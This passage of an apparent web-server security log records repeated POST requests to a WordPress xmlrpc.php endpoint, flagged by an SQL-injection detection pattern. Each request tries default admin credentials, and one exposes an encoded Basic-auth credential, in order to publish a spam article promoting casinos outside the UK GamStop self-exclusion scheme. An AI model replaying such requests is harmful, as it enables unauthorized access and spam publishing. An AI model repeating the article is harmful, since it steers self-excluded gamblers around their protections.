Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>"]
["2026-05-16 20:35:57","89.222.112.54","POST","\/xmlrpc.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36","post","select.+(from|limit) >> <?xml version:'1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\nhost:47.254.126.238\nauthorization:Basic cm9uaTozWmhJIE9jTUMgQ1VreSA0RFV5IEs4MEcgS0RoeQ==\ncontent-type:text\/xml\ncontent-length:14589\naccept-encoding:identity\n\n<?xml version='1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside the United Kingdom, such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions. For UK players, these operators can offer legitimate gaming experiences, but the level of consumer protection, dispute resolution, and eligibility for certain protections varies by regulator. A crucial first step is to verify the operator is transparent about its licensing body, license number, and the regulator’s remit. Look for independent testing seals from organizations like eCOGRA or iTech Labs, which provide auditing of random number generation and payout fairness. Security should be visible too, with strong encryption like TLS and clear privacy policies. The best non GamStop casinos disclose a robust customer support framework, a clear withdrawal policy, and documented dispute resolution channels. It is important to remember that UK residents may still encounter geolocation checks, identity verification, and country specific restrictions that reflect the operator’s license jurisdiction. While offshore licenses can bring benefits such as broader game libraries and sometimes more generous promotions, they also require extra diligence on terms, withdrawal timelines, and potential regulatory recourse. Responsible gambling remains essential; all operators should offer tools to set limits, and players should be mindful of their own boundaries regardless of jurisdiction.<\/p>\n<h2>Behind the Scenes: RNG, RTP, Volatility, and Game Design<\/h2>\n<p>Every online casino game rests on a mathematical and architectural framework that determines how often a player wins, how big those wins are, and how quickly the game cycles through outcomes. The core engine is a random number generator, a sophisticated software component that produces sequences of numbers that mimic randomness. Reputable non GamStop sites publish the software providers they use, and many games are certified by independent labs such as eCOGRA or iTech Labs to validate fairness. The return to player or RTP expresses the theoretical percentage of wagered money that a game will pay back over a long period. For example, a slot with 96 percent RTP suggests that, in the long run, 96 euros returned for every 100 euros wagered, on average. In practice, results can swing dramatically due to variance, especially in shorter sessions. <\/p>\n<p>Volatility or variance describes how widely outcomes swing from the average. Low volatility games tend to deliver frequent small wins, keeping players in the action with steady but modest returns. High volatility titles pay out less often, but the wins, when they occur, can be significant. This has practical implications for strategy and bankroll: a high variance game can exhaust a small bankroll quickly if the player experiences a string of losses, while a low variance title sustains longer sessions with more consistent but modest gains. Game design also matters: progressive jackpots introduce enormous but rare prizes; paytable structures and bonus rounds can shift expected value in visible ways. When analyzing non GamStop sites, players should consider the game mix, ensure that RNGs are certified, and remember that RTP is a long term statistic that cannot guarantee outcomes in any single session. A healthy understanding of RTP, volatility, and game design supports smarter decisions about which games to play and how long to play them in any given session.<\/p>\n<h2>Bankroll Strategy: Managing Risk and Understanding RTP<\/h2>\n<p>Bankroll management is the foundation of sustainable play on non GamStop platforms. A practical approach starts with defining a bankroll that represents funds you are prepared to lose in pursuit of entertainment. A common guideline is to assign a fixed unit of stake relative to your total bankroll and avoid changing bets dramatically in a single session. The relationship between stake size and RTP matters: higher RTP games reduce expected losses per unit of wager in theory, but volatility can still drive large swings, so the size of your bankroll must align with the variance of the games you choose. A typical strategy is to start with a budget and use flat betting or small, incremental increases in response to winning streaks, while employing a strict stop loss and a target profit rule. For example, if you start with a bankroll of 1000 units, using a 2-unit bet per spin on a medium volatility slot with 96 percent RTP, you approach each spin as a tiny fraction of your total resource. The expected value EV per spin is approximately -0.04 times your stake for a 96 percent RTP game, but the actual outcome will deviate in the short term. That deviation is what makes bankroll discipline critical: it helps you ride favorable sequences without overspending. A well structured plan includes setting daily or session caps, monitoring time spent, and avoiding chasing losses when fatigue or emotional pressure enters the decision loop. By combining a clear budget with an informed understanding of RTP and volatility, players can optimize their chances of leaving with a positive sense of accomplishment rather than a regrettable loss.<\/p>\n<h2>Bonus Mechanics, Promotions, and Wagering Realities<\/h2>\n<p>Bonuses are a key lure of non GamStop UK casinos, offering extra playing power but often accompanied by wagering requirements and other terms that shape real value. Welcome bonuses, no deposit bonuses, free spins, and reload offers each carry their own <a href=\"https:\/\/thenethertheplay.co.uk\/\">casinos not on gamstop<\/a> rules about how winnings can be withdrawn, how bets contribute to wagering, and which games count toward playthrough. A typical wagering requirement expresses the total amount of bets that must be staked before bonus funds or winnings become withdrawable. The actual contribution of different game types to these requirements varies; slots may contribute 100 percent, while table games might contribute far less, and some games could be excluded entirely. It is essential to read the terms and conditions closely before triggering a bonus. In a non GamStop environment, you may encounter generous sign ups, but the wagering hurdles can be proportionally higher, and there may be caps on winnings or time limits that reduce the practical value of the offer. Responsible operators provide transparent wagering metrics and clear instructions on how to meet playthrough requirements. Additionally, promotional terms may restrict withdrawals of bonus funds during the early phase of play, and some promotions may be limited to certain payment methods or geographic regions. A disciplined approach is to compare offers across several operators, measure their true value after wagering, and align your choice with your preferred game mix and playing style. This careful analysis helps players avoid common pitfalls such as over claiming, misunderstanding bonus contributions, or mismanaging time limits.<\/p>\n<h2>Payments, KYC vs No-KYC, and Safety Considerations<\/h2>\n<p>Payment methods at non GamStop UK casinos are diverse, reflecting their regulatory and jurisdictional origins. Common options include credit and debit cards, bank transfers, and popular e wallets such as Skrill or Neteller. Some offshore operators also accept crypto currencies, prepaid cards, or alternative payment providers. Each method carries its own processing speed, fees, and security profile. Identity verification or know your customer or KYC checks are standard across reputable operators and are legally required to prevent fraud, money laundering, and underage play. In a KYC focused environment, identity documents and proof of address are required before withdrawals can be processed, and these checks may take place before the first withdrawal or at higher thresholds. Some operators marketed as no KYC offer claim to minimize verification steps for small deposits or early transactions; however, this approach carries significant regulatory risk and potential future withdrawal limitations or account closures. In practice, UK residents should expect some level of verification regardless of licensing, and reputable operators publish a clear verification timeline and a reasonable list of documents. Safety features to look for include SSL\/TLS encryption, two factor authentication options, withdrawal whitelists, and strong customer support. Considering payment methods and KYC requirements is essential for timely withdrawals and secure handling of funds; a well chosen non GamStop site will balance ease of funding with robust identity and risk controls while offering transparent processing times and clear terms about limits and fees. <\/p>\n<h2>Licensing Differences, Responsible Gambling, and Common Player Mistakes<\/h2>\n<p>Licensing differences lie at the heart of why non GamStop UK casinos present both opportunities and risk. Operators licensed by offshore authorities may not be bound by the same level of consumer protection or regulatory enforcement as UK Gambling Commission licensees. This reality makes it essential for players to verify the regulator, ensure there is a credible license number, and confirm if the operator participates in trusted testing regimes and responsible gambling programs. In addition, even within offshore licensing, many operators take responsible gambling seriously, offering timeouts, deposit limits, reality checks, and self assessment tools. The UK audience often expects strong dispute resolution avenues, detailed terms of service, and accessible customer support. Always check for encryption, data protection measures, and clearly stated privacy policies. Self exclusion tools exist beyond GamStop, including local or operator specific controls; players should be aware that non GamStop sites may still implement geographic and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>"]
["2026-05-16 20:36:01","89.222.112.54","POST","\/xmlrpc.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36","post","select.+(from|limit) >> <?xml version:'1.0'?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param>\r\n<value><string>1<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>admin<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><string>Admin@123<\/string><\/value>\r\n<\/param>\r\n<param>\r\n<value><struct>\r\n<member>\r\n<name>mt_keywords<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>mt_convert_breaks<\/name>\r\n<value><string>0<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>description<\/name>\r\n<value><string><![CDATA[<p>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self exclusion framework. These sites operate under offshore or non UK licenses and often advertise generous bonuses, fast withdrawals, and a broader game library. They can be legitimate businesses, regulated by regulators such as the Malta Gaming Authority, the Gibraltar Regulatory Authority, Curacao eGaming, or other jurisdictions, but they do not participate in the UK self exclusion register. For UK players, choosing a non GamStop casino requires careful due diligence: confirm licensing status, verify security protocols, understand payout speeds, and acknowledge the trade offs in consumer protections. This article delivers a professional, in depth guide to non GamStop UK casinos, exploring how the software works behind the scenes, what RTP and volatility mean in practice, how to manage a bankroll, how promotional bonuses operate, and how payment methods and KYC rules differ. We also discuss licensing and regulation differences, the importance of responsible gambling tools, and common mistakes players make. Whether you are drawn by high roller bonuses, a broader game selection, or flexible withdrawal options, informed choices depend on understanding both the technical and regulatory landscape. Remember that gambling should be approached with discipline and awareness of personal limits. If self exclusion or problem gambling concerns arise, seek professional help and use the safeguards available. This guide focuses on safety, legality, and strategic play for the discerning UK enthusiast exploring non GamStop options.<\/p>\n<h2>What Non GamStop UK Casinos Are and Licensing Landscape<\/h2>\n<p>Non GamStop UK casinos are online gambling platforms that do not participate in the GamStop self exclusion service. In practice this usually means they are licensed by regulators outside 